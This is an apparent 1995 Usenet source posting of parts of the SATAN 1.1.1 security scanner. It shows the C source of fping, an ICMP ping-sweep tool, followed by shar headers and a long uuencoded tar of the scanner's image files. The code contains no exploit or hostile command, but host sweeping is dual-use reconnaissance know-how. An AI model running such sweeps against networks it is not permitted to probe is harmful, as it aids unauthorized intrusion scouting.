X fprintf(stderr,
X "This program can only be run by root, or it must be setuid root.\n");
X exit(3);
X }
X
X if ((proto = getprotobyname("icmp")) == NULL)
X crash_and_burn("icmp: unknown protocol");
X
X /* create the socket here as root. Then setuid back to
X the person running the program. This is so they
X can't open a file that doesn't belong to them! */
X
X s = socket(AF_INET, SOCK_RAW, proto->p_proto);
X if (s<0) errno_crash_and_burn("can't create raw socket");
X
X setuid(getuid());
X
X prog = argv[0];
X ident = getpid() & 0xFFFF;
X
X verbose_flag=1;
X
X opterr=0;
X
X while ((c = getopt(argc,argv,"edhqusavt:i:f:r:")) != EOF)
X switch (c) {
X case 't': if ( (timeout=atoi(optarg)) <0) usage(); break;
X case 'f': filename= optarg; break;
X case 'r': if ((retry=atoi(optarg))<0) usage(); break;
X case 'i': if ((interval=atoi(optarg))<0) usage(); break;
X case 'h': usage(); break;
X case 'q': verbose_flag = 0; break;
X case 'e': elapsed_flag = 1; break;
X case 'd': dns_flag = 1; break;
X case 's': stats_flag = 1; break;
X case 'u': unreachable_flag = 1; break;
X case 'a': alive_flag = 1; break;
X case 'v':
X printf("%s: $Revision: 1.20 $ $Date: 1993/02/23 00:16:38 $\n",argv[0]);
X printf("%s: comments to sche...@Stanford.EDU\n",argv[0]);
X exit(0);
X default : fprintf(stderr,"Unknown flag: %s\n",argv[0]);
X usage(); break;
X }
X
X if (unreachable_flag && alive_flag) {
X fprintf(stderr,"%s: specify only one of a,u\n",argv[0]);
X usage();
X }
X
X if ( (interval<10 || retry >20 || timeout <250) && getuid()) {
X fprintf(stderr,"%s: these options are too risky for mere mortals.\n",prog);
X fprintf(stderr,"%s: You need i >=10, retry < 20, and t >= 250\n",prog);
X exit(3);
X }
X
X if (alive_flag || unreachable_flag) verbose_flag=0;
X
X argv = &argv[optind];
X if (*argv && filename) { usage(); }
X if (!*argv && !filename) { filename = "-"; }
X
X if (*argv) while (*argv) {
X add_host(*argv);
X ++argv;
X } else if (filename) {
X FILE *ping_file;
X char line[132];
X char host[132],*p;
X if (strcmp(filename,"-")==0) {
X ping_file=fdopen(0,"r");
X } else {
X ping_file=fopen(filename,"r");
X }
X if (!ping_file) errno_crash_and_burn("fopen");
X while(fgets(line,132,ping_file)) {
X sscanf(line,"%s",host);
X if ((!*host) || (host[0]=='#')) /* magic to avoid comments */
X continue;
X p=(char*)malloc(strlen(host)+1);
X if (!p) crash_and_burn("can't malloc host");
X strcpy(p,host);
X add_host(p);
X }
X fclose(ping_file);
X } else usage();
X
X if (!num_hosts) exit(2);
X
X /* allocate array to hold outstanding ping requests */
X
X table = (HOST_ENTRY **) malloc(sizeof(HOST_ENTRY *)*num_hosts);
X if (!table) crash_and_burn("Can't malloc array of hosts");
X
X cursor=rrlist;
X
X for( num_waiting=0; num_waiting < num_hosts; num_waiting++ ) {
X table[num_waiting]=cursor;
X cursor->i = num_waiting;
X cursor=cursor->next;
X }
X
X gettimeofday(&start_time,&tz);
X cursor=rrlist;
X while (num_waiting) { /* while pings are outstanding */
X if ( (timeval_diff(&current_time,&cursor->last_time)> timeout) ||
X cursor->num_packets_sent==0) {
X if (cursor->num_packets_sent>0) num_timeout++;
X if (cursor->num_packets_sent == retry+1) {
X if(verbose_flag || unreachable_flag) {
X if (dns_flag) printf("%s",
X get_host_by_address(cursor->saddr.sin_addr));
X else printf("%s",cursor->host);
X if (verbose_flag) printf(" is unreachable");
X printf("\n");
X }
X num_unreachable++;
X remove_job(cursor);
X } else send_ping(s,cursor);
X }
X while(wait_for_reply() && num_waiting) { /* call wfr until we timeout */
X /* wait! */
X }
X gettimeofday(&current_time,&tz);
X if (cursor) cursor = cursor->next;
X }
X
X gettimeofday(&end_time,&tz);
X
X if (stats_flag) {
X fflush(stdout);
X fprintf(stderr,"\n");
X fprintf(stderr," %8d hosts\n",num_hosts);
X fprintf(stderr," %8d alive\n",num_alive);
X fprintf(stderr," %8d unreachable\n",num_unreachable);
X fprintf(stderr," %8d unknown addresses\n",num_noaddress);
X fprintf(stderr,"\n");
X fprintf(stderr," %8d timeouts (waiting for response)\n",num_timeout);
X fprintf(stderr," %8d pings sent\n",num_pingsent);
X fprintf(stderr," %8d pings received\n",num_pingreceived);
X fprintf(stderr,"\n");
X
Xif (total_replies==0) {
X min_reply=0; max_reply=0; total_replies=1; sum_replies=0;
X}
X
X fprintf(stderr," %8d msec (min round trip time)\n",min_reply);
X fprintf(stderr," %8d msec (avg round trip time)\n",(int)sum_replies/total_replies);
X fprintf(stderr," %8d msec (max round trip time)\n",max_reply);
X fprintf(stderr," %8.3f sec (elapsed real time)\n",
X timeval_diff( &end_time,&start_time)/1000.0);
X fprintf(stderr,"\n");
X
X }
X
X if (num_noaddress) exit(2);
X else if (num_alive != num_hosts) exit(1);
X
X exit(0);
X
X}
X
X
X/*
X *
X * Compose and transmit an ICMP_ECHO REQUEST packet. The IP packet
X * will be added on by the kernel. The ID field is our UNIX process ID,
X * and the sequence number is an index into an array of outstanding
X * ping requests. The sequence number will later be used to quickly
X * figure out who the ping reply came from.
X *
X */
X
X#ifdef _NO_PROTO
Xvoid send_ping(s,h)
Xint s; HOST_ENTRY *h;
X#else
Xvoid send_ping(int s,HOST_ENTRY *h)
X#endif
X{
X static char buffer[32];
X struct icmp *icp = (struct icmp *) buffer;
X int n,len;
X
X gettimeofday(&h->last_time,&tz);
X
X icp->icmp_type = ICMP_ECHO;
X icp->icmp_code = 0;
X icp->icmp_cksum = 0;
X icp->icmp_seq = h->i;
X icp->icmp_id = ident;
X#define SIZE_ICMP_HDR 8
X#define SIZE_PACK_SENT (sizeof(h->num_packets_sent))
X#define SIZE_LAST_TIME (sizeof(h->last_time))
X
X bcopy(&h->last_time,&buffer[SIZE_ICMP_HDR],SIZE_LAST_TIME);
X bcopy(&h->num_packets_sent,
X &buffer[SIZE_ICMP_HDR+SIZE_LAST_TIME], SIZE_PACK_SENT);
X
X len = SIZE_ICMP_HDR+SIZE_LAST_TIME+SIZE_PACK_SENT;
X
X icp->icmp_cksum = in_cksum( (u_short *)icp, len );
X
X n = sendto( s, buffer, len, 0, (struct sockaddr *)&h->saddr,
X sizeof(struct sockaddr_in) );
X if( n < 0 || n != len ) {
X if (verbose_flag || unreachable_flag) {
X if (dns_flag) printf("%s",get_host_by_address(h->saddr.sin_addr));
X else printf("%s",cursor->host);
X if (verbose_flag) printf(" error while sending ping: %s\n",
X sys_errlist[errno]);
X printf("\n");
X }
X num_unreachable++;
X remove_job(h);
X } else {
X h->num_packets_sent++;
X num_pingsent++;
X }
X
X}
X
X#ifdef _NO_PROTO
Xint wait_for_reply()
X#else
Xint wait_for_reply()
X#endif
X{
Xint result;
Xstatic char buffer[4096];
Xstruct sockaddr_in response_addr;
Xstruct ip *ip;
Xint hlen;
Xstruct icmp *icp;
Xint n;
XHOST_ENTRY *h;
X
Xlong this_reply;
Xint the_index;
Xstruct timeval sent_time;
X
X
X result=recvfrom_wto(s,buffer,4096,
X (struct sockaddr *)&response_addr,interval);
X
X if (result<0) { return 0; } /* timeout */
X
X ip = (struct ip *) buffer;
X hlen = ip->ip_hl << 2;
X if (result < hlen+ICMP_MINLEN) { return(1); /* too short */ }
X
X icp = (struct icmp *)(buffer + hlen);
X
X if (
X ( icp->icmp_type != ICMP_ECHOREPLY ) ||
X ( icp->icmp_id != ident )
X ) {
X return 1; /* packet received, but not the one we are looking for! */
X }
X
X num_pingreceived++;
X
X if ( ( icp->icmp_seq >= num_hosts ) ||
X ( !table[icp->icmp_seq] ) ||
X ( table[icp->icmp_seq]->saddr.sin_addr.s_addr
X != response_addr.sin_addr.s_addr)) {
X return 1; /* packet received, don't about it anymore */
X }
X
X n=icp->icmp_seq;
X h=table[n];
X
X gettimeofday(&current_time,&tz);
X bcopy(&icp->icmp_data[0],&sent_time,sizeof(sent_time));
X bcopy(&icp->icmp_data[SIZE_LAST_TIME],&the_index, sizeof(the_index));
X this_reply = timeval_diff(&current_time,&sent_time);
X if (this_reply>max_reply) max_reply=this_reply;
X if (this_reply<min_reply) min_reply=this_reply;
X sum_replies += this_reply;
X total_replies++;
X
X if(verbose_flag||alive_flag) {
X if (dns_flag) printf("%s",get_host_by_address(response_addr.sin_addr));
X else printf("%s",h->host);
X if (verbose_flag) printf(" is alive");
X if (elapsed_flag) printf(" (%d msec)",this_reply);
X printf("\n");
X }
X num_alive++;
X remove_job(h); /* remove job */
X return num_waiting;
X}
X
X/*
X * Checksum routine for Internet Protocol family headers (C Version)
X * From ping examples in W.Richard Stevens "UNIX NETWORK PROGRAMMING" book.
X */
X
X#ifdef _NO_PROTO
Xint in_cksum(p,n)
Xu_short *p; int n;
X#else
Xint in_cksum(u_short *p, int n)
X#endif
X{
X register u_short answer;
X register long sum = 0;
X u_short odd_byte = 0;
X
X while( n > 1 ) { sum += *p++; n -= 2; }
X
X /* mop up an odd byte, if necessary */
X if( n == 1 ) {
X *(u_char *)(&odd_byte) = *(u_char *)p;
X sum += odd_byte;
X }
X
X sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
X sum += (sum >> 16); /* add carry */
X answer = ~sum; /* ones-complement, truncate*/
X return (answer);
X}
X
X
X/* add host to linked list of hosts to be pinged */
X/* assume memory for *host is ours!!! */
X
X#ifdef _NO_PROTO
Xvoid add_host(host)
Xchar *host;
X#else
Xvoid add_host(char *host)
X#endif
X{
X HOST_ENTRY *p;
X struct hostent *host_ent;
X struct in_addr *host_add;
X
X#ifndef __alpha
X u_long ipaddress = inet_addr(host);
X#else
X u_int ipaddress = inet_addr(host);
X#endif
X
X if ( (ipaddress == -1) &&
X ( ((host_ent=gethostbyname(host)) == 0) ||
X ((host_add = (struct in_addr *) *(host_ent->h_addr_list))==0))
X ) {
X if (verbose_flag) fprintf(stderr,"%s address not found\n",host);
X num_noaddress++;
X return;
X }
X
X p = (HOST_ENTRY *) malloc(sizeof(HOST_ENTRY));
X if (!p) crash_and_burn("can't allocate HOST_ENTRY");
X
X p->host=host;
X p->num_packets_sent = 0;
X p->last_time.tv_sec =0;
X p->last_time.tv_usec =0;
X
X bzero((char*) &p->saddr, sizeof(p->saddr));
X p->saddr.sin_family = AF_INET;
X
X if (ipaddress==-1) p->saddr.sin_addr = *host_add;
X else p->saddr.sin_addr.s_addr = ipaddress;
X
X if (!rrlist) {
X rrlist = p;
X p->next = p;
X p->prev = p;
X } else {
X p->next = rrlist;
X p->prev = rrlist->prev;
X p->prev->next = p;
X p->next->prev = p;
X rrlist = p;
X }
X num_hosts++;
X}
X
X#ifdef _NO_PROTO
Xvoid remove_job(h)
XHOST_ENTRY *h;
X#else
Xvoid remove_job(HOST_ENTRY *h)
X#endif
X{
X
X table[h->i]=NULL;
X --num_waiting;
X
X if (num_waiting) { /* remove us from list of jobs */
X h->prev->next = h->next;
X h->next->prev = h->prev;
X if (h==cursor) { cursor = h-> next; }
X } else {
X cursor=NULL;
X rrlist=NULL;
X }
X
X}
X
X#ifdef _NO_PROTO
Xchar *get_host_by_address(in)
Xstruct in_addr in;
X#else
Xchar *get_host_by_address(struct in_addr in)
X#endif
X{
X struct hostent *h;
X h=gethostbyaddr((char *) &in,sizeof(struct in_addr),AF_INET);
X if (h==NULL || h->h_name==NULL) return inet_ntoa(in);
X else return h->h_name;
X}
X
X
X#ifdef _NO_PROTO
Xvoid crash_and_burn(message)
Xchar *message;
X#else
Xvoid crash_and_burn(char *message)
X#endif
X{
X if (verbose_flag) fprintf(stderr,"%s: %s\n",prog,message);
X exit(4);
X}
X
X#ifdef _NO_PROTO
Xvoid errno_crash_and_burn(message)
Xchar *message;
X#else
Xvoid errno_crash_and_burn(char *message)
X#endif
X{
X if (verbose_flag)
X fprintf(stderr,"%s: %s : %s\n",prog,message,sys_errlist[errno]);
X exit(4);
X}
X
X#ifdef _NO_PROTO
Xlong timeval_diff(a,b)
Xstruct timeval *a,*b;
X#else
Xlong timeval_diff(struct timeval *a,struct timeval *b)
X#endif
X{
Xdouble temp;
X
Xtemp =
X (((a->tv_sec*1000000)+ a->tv_usec) -
X ((b->tv_sec*1000000)+ b->tv_usec))/1000;
X
Xreturn (long) temp;
X
X}
X
X/*
X * recvfrom_wto: receive with timeout
X * returns length of data read or -1 if timeout
X * crash_and_burn on any other errrors
X *
X */
X
X
X#ifdef _NO_PROTO
Xint recvfrom_wto (s,buf,len, saddr, timo)
Xint s; char *buf; int len; struct sockaddr *saddr; int timo;
X#else
Xint recvfrom_wto (int s, char *buf, int len, struct sockaddr *saddr, int timo)
X#endif
X{
X int nfound,slen,n;
X struct timeval to;
X fd_set readset,writeset;
X
X to.tv_sec = timo/1000;
X to.tv_usec = (timo - (to.tv_sec*1000))*1000;
X
X FD_ZERO(&readset);
X FD_ZERO(&writeset);
X FD_SET(s,&readset);
X nfound = select(s+1,&readset,&writeset,NULL,&to);
X if (nfound<0) errno_crash_and_burn("select");
X if (nfound==0) return -1; /* timeout */
X slen=sizeof(struct sockaddr);
X n=recvfrom(s,buf,len,0,saddr,&slen);
X if (n<0) errno_crash_and_burn("recvfrom");
X return n;
X}
X
X#ifdef _NO_PROTO
Xvoid usage()
X#else
Xvoid usage()
X#endif
X{
X fprintf(stderr,"\n");
X fprintf(stderr,"Usage: %s [options] [systems...]\n",prog);
X fprintf(stderr," -a show systems that are alive\n");
X fprintf(stderr," -d use dns to lookup address for return ping packet\n");
X fprintf(stderr," -e show elapsed time on return packets\n");
X fprintf(stderr," -f file read list of systems from a file ( - means stdin)\n");
X fprintf(stderr," -i n interval (between ping packets) in milliseconds (default %d)\n",interval);
X fprintf(stderr," -q quiet (don't show per host results)\n");
X fprintf(stderr," -r n retry limit (default %d)\n",retry);
X fprintf(stderr," -s dump final stats\n");
X fprintf(stderr," -t n individual host timeout in milliseconds (default %d)\n",timeout);
X fprintf(stderr," -u show systems that are unreachable\n");
X fprintf(stderr," -v show version\n");
X fprintf(stderr," systems list of systems to check (if no -f specified)\n");
X fprintf(stderr,"\n");
X exit(3);
X}
END_OF_FILE
if test 23240 -ne `wc -c <'satan-1.1.1/src/fping/fping.c'`; then
echo shar: \"'satan-1.1.1/src/fping/fping.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/fping.c'
fi
echo shar: End of archive 2 $of 15$.
cp /dev/null ark2isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 127
Archive-name: satan/part03

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/dots.tar.UU satan-1.1.1/html/docs/FAQ.html
# satan-1.1.1/src/port_scan/udp_scan.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:08 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 3 (of 15)."'
if test -f 'satan-1.1.1/dots.tar.UU' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/dots.tar.UU'\"
else
echo shar: Extracting \"'satan-1.1.1/dots.tar.UU'\" $22615 characters$
sed "s/^X//" >'satan-1.1.1/dots.tar.UU' <<'END_OF_FILE'
Xbegin 664 satan-1.1.1/dots.tar
XM<V%T86XM,2XQ+C$O:'1M;"]D;W1S+P

XM
XM " @(#<W-2 (" @-#8U( @(" U,#8@ " @(" @(" @(" P

XM(" U-S0R-3(Q-30Q(" @-S4T, @

XM
XM
XM
XM
XM
XM
XM

XM !S871A;BTQ+C$N,2]H=&UL+V1O=',O8FQA8VMD
XM;W0N9VEF

XM (" @-C P( @(" T-C4@ " @

XM(#4P-B (" @(" @(" Q-C(@(#4W,S$S-#,P,S8@(#$R,#0S "

XM
XM
XM
XM
XM
XM
XM

XM $=)1C@Y80X #@#"
XM ?'Q^4E)0@(" 4%!3\_OX$! 0 /\A^00! ' "P #@ . #
XM-WBZW/Y,!&.">((:8L:-%"%V'C,11<$- \!LXMJZBT:Q0&ZR?*XO@IX/$&@(
XMAKFBX^A30I[010( .V8 7 !IZ( ' ,8G)O=VYD;W0N9VEF 9
XM &P :>C !0 !V1O="YG:68 @ !IZ0 & +97EE8F%L;"YG:68
XMF !IZ4 ' ,9W)E96YD;W0N9VEF '-R + :>F !P #6]R86YG961O
XM="YG:68 5=P #( &GIP < YO<FEG+F1E=FEL+F=I9@!T W !IZ@
XM& +<&EN:V1O="YG:68 ] !IZD ' -<'5R<&QE9&]T+F=I9@ P
XM 0@ :>J !@ "G)E9&1O="YG:68 = 2 :>K !P #'=H:71E9&]T+F=I
XM9@ 5P ( &GK < UY96QL;W=D;W0N9VEF % !@ "'-E;F1M86EL
XM '1Y @ -1 !P #F=A=&5W87DN=&%R+F=Z &P 0 %MSP 4 5S
XM871A;@ 32 4 =44TE'+G5P 90 !-0 !0 !FEI/6YA:0 , !J
XM$TT & *<V%T86XM,2XQ+C$O:'1M;"]D;W1S+V)L=65D;W0N9VEF
XM
XM " @(#8P," (" @-#8U( @(" U,#8@ " @(" @
XM(" @,C,T(" U-S,Q,S0S,#,V(" Q,3<Q-@ @

XM
XM
XM
XM
XM
XM
XM

XM !'248X.6$. X XP <FS)2DJ;!@""
XM 0#^ P!:A(_8!@#-!@#D$ O^_P #P[..CC7!0"9 !*!P9_ "Z(?D$ 0
XM"0 L X #@ !$DPR4FKO10LI1:X@#&,A_%E(K(@)7-*RX 4!6(\C$,I
XM\JK@ L+N0+PQ@L+)XL$$$AJZ"8!!%3B>C4 %0.@VOEH+X$IPA#'H]"0" #L
XM "P &GI@ < UO<F%N9V5D;W0N9VEF &PN R !IZ< ' .;W)I9RYD
XM979I;"YG:68 9@ -P :>H !@ "W!I;FMD;W0N9VEF /0 :>I !P
XM#7!U<G!L961O="YG:68 978 $( &GJ@ 8 IR961D;W0N9VEF &L $@
XM &GJP < QW:&ET961O="YG:68 961O " !IZP ' ->65L;&]W9&]T
XM+F=I9@ N9VEF '0 $@ &GJP < QW:&ET961O="YG:68 %< " !
XMIZP ' ->65L;&]W9&]T+F=I9@ !0 8 AS96YD;6%I; !T>0 ( #
XM40 < YG871E=V%Y+G1A<BYG>@!L $ !;<\ % %<V%T86X $T@ % '
XM5%-)1RYU< &4 34 4 9I:3UN86D # :@ !-- !@ "G-A=&%N
XM+3$N,2XQ+VAT;6PO9&]T<R]B<F]W;F1O="YG:68
XM
XM @(" V,# @ " @(#0V-2 (" @-3 V( @(" @(" @(#$V-R @-3<S
XM,3,T,S S-B @,3(Q,C, (

XM
XM
XM
XM
XM
XM
XM

XM 1TE&.#EA#@ 0 ,( %L .Z?GY*0C[8 3%P^0N\E,3+/
XM2+^_OR'Y! $ < + . ! ,\>+K<_C >40@IX@7#A1E!XQE%^0W9
XM4I#*2@ #0U F,0" 3!B[C><JR^#S RH$L"(NM0@H80_DCRFI6B4) #ME;F1O
XM="YG:68 "8 L !IZ8 ' -;W)A;F=E9&]T+F=I9@ L ,@ :>G
XM !P #F]R:6<N9&5V:6PN9VEF ,@ #< &GJ 8 MP:6YK9&]T+F=I9@
XM #T &GJ0 < UP=7)P;&5D;W0N9VEF #T !" !IZH & *<F5D9&]T
XM+F=I9@!V !( !IZL ' ,=VAI=&5D;W0N9VEF !( @ :>L !P
XM#7EE;&QO=V1O="YG:68 @ :>L !P #7EE;&QO=V1O="YG:68 +F=I9@!T
XM !( !IZL ' ,=VAI=&5D;W0N9VEF !7 @ :>L !P #7EE;&QO
XM=V1O="YG:68 4 & (<V5N9&UA:6P ='D " U$ ' .9V%T97=A
XM>2YT87(N9WH ; ! 6W/ !0 !7-A=&%N !-( !0 !U1324<N=7 !
XME $U % &:6D];F%I P &H 330 8 IS871A;BTQ+C$N,2]H=&UL
XM+V1O=',O9&]T+F=I9@
XM (" @-C P
XM( @(" T-C4@ " @(#4P-B (" @(" @(" Q-S<@(#4W,S$S-#,P,S8@(#$Q
XM,#4T "

XM
XM
XM
XM
XM
XM
XM

XM $=)1C@W81 #P#" "=;WX2$'?+XLW#V,0-"\VGOJF#F86P?X\L !
XM#P TQXNC?R\+'E(IQJ:!TG($1@;-P2@&@8%(6V@,$)B^R@?*D:L\6=QS&
XM@>5# 8&&85&'3/9NQV-2>0, @,(I<6'-3H<MC]?9LGEXO$T" #MI9@ F
XM ,@ :>G !P #F]R:6<N9&5V:6PN9VEF + #< &GJ 8 MP:6YK9&]T
XM+F=I9@ #T &GJ0 < UP=7)P;&5D;W0N9VEF &8 !" !IZH & *
XM<F5D9&]T+F=I9@!I !( !IZL ' ,=VAI=&5D;W0N9VEF &8 =@ @
XM :>L !P #7EE;&QO=V1O="YG:68 2 ( &GK < UY96QL;W=D;W0N
XM9VEF ( &GK < UY96QL;W=D;W0N9VEF "YG:68 = 2 :>K !P
XM#'=H:71E9&]T+F=I9@ 5P ( &GK < UY96QL;W=D;W0N9VEF %
XM !@ "'-E;F1M86EL '1Y @ -1 !P #F=A=&5W87DN=&%R+F=Z &P
XM 0 %MSP 4 5S871A;@ 32 4 =44TE'+G5P 90 !-0 !0 !FEI
XM/6YA:0 , !J $TT & *<V%T86XM,2XQ+C$O:'1M;"]D;W1S+V5Y96)A
XM;&PN9VEF
XM " @(#8P," (" @-#8U( @
XM(" U,#8@ " @(" @(" @,S(Q(" U-S,Q,S0S,#,V(" Q,38W,@ @

XM
XM
XM
XM
XM
XM
XM

XM !'248X.6$. X
XMA <W-S:VMK8V-CWM[>QL;&G)R<E)24A(2$6EI:____2DI*[^_OY^?G
XMS\_/O;V] #_
XM (?D$ 0 #@ L X #@ !4Z@(XYD20(.BIHJX*JL(C/%
XM*JJRW!2&G>8*".1Q0*Q<.8@+@DBT (1&0PF #)PWP&-+A2P"-L#!4!0N%JZ3
XM0) XHWVW0"(!AH]>:9.>% ( .W0N9VEF @ $@ &GJP < QW:&ET961O
XM="YG:68 :>K " !IZP ' ->65L;&]W9&]T+F=I9@"GK < UY96QL
XM;W=D;W0N9VEF $@ " !IZP ' ->65L;&]W9&]T+F=I9@ " !IZP
XM' ->65L;&]W9&]T+F=I9@ N9VEF '0 $@ &GJP < QW:&ET961O="YG
XM:68 %< " !IZP ' ->65L;&]W9&]T+F=I9@ !0 8 AS96YD;6%I
XM; !T>0 ( #40 < YG871E=V%Y+G1A<BYG>@!L $ !;<\ % %
XM<V%T86X $T@ % '5%-)1RYU< &4 34 4 9I:3UN86D # :@
XM !-- !@ "G-A=&%N+3$N,2XQ+VAT;6PO9&]T<R]G<F5E;F1O="YG:68

XM
XM @(" V,# @ " @(#0V-2 (" @-3 V( @(" @

XM(" @(#(S,R @-3<S,3,T,S S-B @,3(P-C8 (

XM
XM
XM
XM
XM
XM
XM

XM 1TE&.#EA#@ . ., "9%B"(
XM+P#U'P!*"03_)@!:# "$$@K.)0##&@'9'WW3A09M$TC.6B#_/ "'Y! $
XM + . X 1($,A)J[UT-83:NHM2C$/R96+A%&5P2LVX+(Z2! >%
XMC(Z#W >#3C%0V' &X:21: :0!$;FB6,8"(1&9<&P8@D"D-7 T&+.:$H$ #MP
XM;&5D;W0N9VEF #T !" !IZH & *<F5D9&]T+F=I9@"I !( !IZL
XM' ,=VAI=&5D;W0N9VEF !( @ :>L !P #7EE;&QO=V1O="YG:68
XM @ :>L !P #7EE;&QO=V1O="YG:68 IZP ' ->65L;&]W9&]T+F=I9@ !
XM( @ :>L !P #7EE;&QO=V1O="YG:68 @ :>L !P #7EE;&QO=V1O
XM="YG:68 +F=I9@!T !( !IZL ' ,=VAI=&5D;W0N9VEF !7 @
XM :>L !P #7EE;&QO=V1O="YG:68 4 & (<V5N9&UA:6P ='D "
XM U$ ' .9V%T97=A>2YT87(N9WH ; ! 6W/ !0 !7-A=&%N !-( !0
XM!U1324<N=7 !E $U % &:6D];F%I P &H 330 8 IS871A
XM;BTQ+C$N,2]H=&UL+V1O=',O;W)A;F=E9&]T+F=I9@
XM
XM (" @-C P( @(" T-C4@ " @(#4P-B (" @(" @(" R,S$@(#4W
XM,S$S-#,P,S8@(#$R,C,W "

XM
XM
XM
XM
XM
XM
XM

XM $=)1C@Y80X #@#C "X: #)= !:- #;K''.CC:#2P#[
XMC@+EF36+93%M0 ;=?P#^F P /^55@%**@ A^00! , "P #@ .
XM $1I#)2:N]=) 0R+B#8HQ&\&6!L1R+$C2G1*C#T )-0:7KG0L[A3" *PB
XM$P)@610X$IF&M)!P.A"50:+JZ&(MVF/BBRF;)Q$ .V5D9&]T+F=I9@!I !
XM( !IZL ' ,=VAI=&5D;W0N9VEF &8 J0 @ :>L !P #7EE;&QO=V1O
XM="YG:68 2 ( &GK < UY96QL;W=D;W0N9VEF ( &GK < UY
XM96QL;W=D;W0N9VEF *>L !P #7EE;&QO=V1O="YG:68 2 ( &GK <
XM UY96QL;W=D;W0N9VEF ( &GK < UY96QL;W=D;W0N9VEF "YG:68
XM= 2 :>K !P #'=H:71E9&]T+F=I9@ 5P ( &GK < UY96QL
XM;W=D;W0N9VEF % !@ "'-E;F1M86EL '1Y @ -1 !P #F=A=&5W
XM87DN=&%R+F=Z &P 0 %MSP 4 5S871A;@ 32 4 =44TE'+G5P
XM 90 !-0 !0 !FEI/6YA:0 , !J $TT & *<V%T86XM,2XQ+C$O:'1M
XM;"]D;W1S+V]R:6<N9&5V:6PN9VEF
XM " @(#8P
XM," (" @-#8U( @(" U,#8@ " @(" @(" S,C0P(" U-S,Q,S0S,#,V(" Q
XM,C,T,@ @

XM
XM
XM
XM
XM
XM
XM

XM !'248X-V%$ '0 \@ +P ^8V,Y100IP4 :@$ \T ZS0H#O[^_+ !$
XM '0 /^>+K<_C#*2:N].&L;0-A@R'0 ()X: 1 %\:%!(1/HT[7&L*+M0-"U
XM1F=@*+9>H<!@\$$&#RN#0) ;%$X$P>\I!!2G FO B?F%R<\5$;QT86XN@@_]
XM_!&*4F.YI-:9N"-J7V=O*W)V=$$J1%)3!E<7=G(^)8"!68,"D!P 2YY E@HE
XM=X,YFQ,=DY)_H21+>$N)#C^>/C^R,*.8532X"D.OE+ZYI'ES%"L%/K:CH0NC
XMCK"G$!TYDBINSJF.C"P2)'>?HY7.HP541&VR?.F'*R7#2<E4L-DVH]8_NO$@
XMT-'Y$?@<\F1HA[85__#( D<KWRUG4!!^D190%ZU/*CRT0CC^I4".(@LMUFIC
XM)Y2YCD663&/ I\\2=(@V9M$DPU-(0W88D03%Q1^]3Q$8#DQIJPD@;-%J^<KI
XMJ0I&C34RLDA7:\N$G)-&VN(I0F358Z@,;=7*)*I%K#$GG"4YDIP(.#V6'>)*
XM3=?6K%4,;AA3(MC.A\C.XFV4DE\#J3*4.;7C]IO@BR^G6-G;J87BE*OBM<1Y
XM;0 8 X89L$@,)LQ=>XX%ZI.DTT_H S$2GX-I9V70=X\A+UDQAL*85+$]2J9E
XM]8+0:PV=\I$@5:J5V;; 7FBYNO-$+5#OZ3*DR9@XNFJW"Z9"+^-MBQ*Y545=
XM@;K4OGCRP7L@7DUIT^WT3E<][F+^&'<>F%! #0TAQ=YO%#"7@4DX":>9TXI
XM*%!!<A#&B$.;:4#=9NPT98T:RH3(VCD3W=72:[!Q.(Y(M,F1F(56&+/8*HU9
XMH.** DF1&"VRT22;3IC1B&*#*V(C5B,>>9)8;#'$D$=\?YF7 8?Z4(@'3548
XM\=N6,G1$(CIR89,!D:LP1LMGLFTYQHM@R +1F(:MQDV-,KQV7--<NE1ER3F
XM@=]?L,FI6I3/T?.(#&HR&<-GC1AJP \MZ!=(!T2ZI]62B ZH:'!L7GGG:>?=
XM:%%\2_ZRYIJ:QM8F(VTJ@UQQ#71(I4"O/+(E;'IJVF5']^VJ U;9=:'*G+3F
XMD6IOI\K^UB--;?[$%"6LQ-H'C=21=RR7CUC+K)?,?NA21G0TV%E&.=HZ@V5+
XM+KK3&GS&X"!QY&HW*!'D1F'N-5K&ME44]"!:+V?ZT$&E&=@5^U%TC!P;Z2A6
XM/)>DBHS5N,"_%>9 '9!9VI*FJ]C, .FC$*^6")D5,X/0&H8J0ZN;.QV*S[_$
XM F#;G%HYIY.9&YJIBI$PNP=8%[1Z2&>M?HA*\[X]J\8C&O6R)L583QD]9Y52
XMNZ0.T$I7.-9<2=^X6M5]8#8-R:N!_&K$8,?L-<K2+4 FTA1V#78X)D\HB)O>
XMT&<7N<BE[75W($/LV8XWS<6P.'YSZ+#*5..C20QYZXV3>T7^T)FX0#2Y.S7*
XM2>*B-'5Y58FVU'BZ6]V9C'JN-G$7UVWT'9FVDW"C_]GFML^?LQ/DK-0ANB8>
XM?%[7M@.\;R@6F!2_UTGFL0%/(M&28JW&Z,6"V<9I%_D>W*'!$Z7ZH(W;E0F"
XMP4QB[8"Z>GDH49/YQA_:D^C(*:J9MDO_.;5&HT(\E1;4(?#T:Y*;V(2IQ+#E
XM8#XH!,""UA%.^:Y[2%)69ZZ& 4M%K$*/N]9O:-,H917M'7&JH%WV=;<,HF][
XMM8D@]QS$A]?,"4I#BX^/A!.&3$70@(AKQIC*]1'6-(571($4:<Y!Q)J,#D41
XM"5L[LO(#VI&D#\OBE9$RI $B0>C^/_!"&16HA@TM<NM1_T+BVT(WP2?FK!95
XM4$8;!-*;#4SM=)8+6?C.MK]<9$UG26-=S( 5+7D\9G)K@Y8<A5&#.^9.<&%X
XM'=5J(*XIPHM:#.O;65I82/ZTA"IXZ!ED1&<XB5&&,[B)7WF\!BSJ>0")+(GD
XM!5\QRH%= T<<.D$J-MD75GKK<AQ"Y3.F5SZGK;%,<Z.B/*[W) 5Q#2WA"QDE
XM09 *SRP#AH T$(!>)\@0E&!/SZS'' $FMT5 2Y>I8%]I D?*+D+R6U(J1"H\
